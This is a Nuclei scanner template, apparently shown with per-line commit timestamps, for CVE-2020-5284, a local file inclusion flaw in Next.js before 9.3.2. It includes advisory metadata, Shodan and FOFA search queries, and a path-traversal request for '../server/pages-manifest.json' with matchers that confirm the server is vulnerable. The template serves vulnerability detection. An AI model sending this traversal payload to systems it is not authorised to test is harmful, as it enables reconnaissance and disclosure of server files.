2021-01-02 04:56:15 +00:00
id : CVE-2020-5284
2020-04-05 18:24:33 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Next.js <9.3.2 - Local File Inclusion
2021-06-09 12:20:56 +00:00
author : rootxharsh,iamnoooob,dwisiswant0
2020-04-05 18:24:33 +00:00
severity : medium
2022-07-26 13:45:11 +00:00
description : Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
2023-09-06 12:22:36 +00:00
remediation : This issue is fixed in version 9.3.2.
2021-03-21 06:41:45 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://github.com/zeit/next.js/releases/tag/v9.3.2
- https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-5284
2024-01-29 17:11:14 +00:00
- https://github.com/Z0fhack/Goby_POC
- https://github.com/merlinepedra/nuclei-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-5284
2023-07-11 19:49:27 +00:00
cwe-id : CWE-22,CWE-23
2024-03-23 09:28:19 +00:00
epss-score : 0.00213
2024-05-31 19:23:20 +00:00
epss-percentile : 0.5933
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : zeit
product : next.js
2024-06-07 10:04:29 +00:00
shodan-query :
- http.html:"/_next/static"
- cpe:"cpe:2.3:a:zeit:next.js"
2024-05-31 19:23:20 +00:00
fofa-query : body="/_next/static"
2023-12-05 09:50:33 +00:00
tags : cve,cve2020,nextjs,lfi,zeit
2020-04-05 18:24:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-04-05 18:24:33 +00:00
- method : GET
path :
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
2023-07-11 19:49:27 +00:00
2020-07-08 08:45:18 +00:00
matchers-condition : and
2020-04-05 18:24:33 +00:00
matchers :
2020-08-24 04:34:40 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-08-24 04:34:40 +00:00
words :
- "application/json"
2023-07-11 19:49:27 +00:00
- type : regex
part : body
regex :
- '\{"/_app":".*?_app\.js"'
2020-04-05 18:24:33 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a00463044022023bc2f641d20123490efc665405d1718d2cff3508a254af144f2ef63559f64aa02200d4fe3d8d5eef78527ed3c9b671c5b0a5fdac88e52d97c47360f264406f28f17:922c64590222798bb761d5b6d8e72950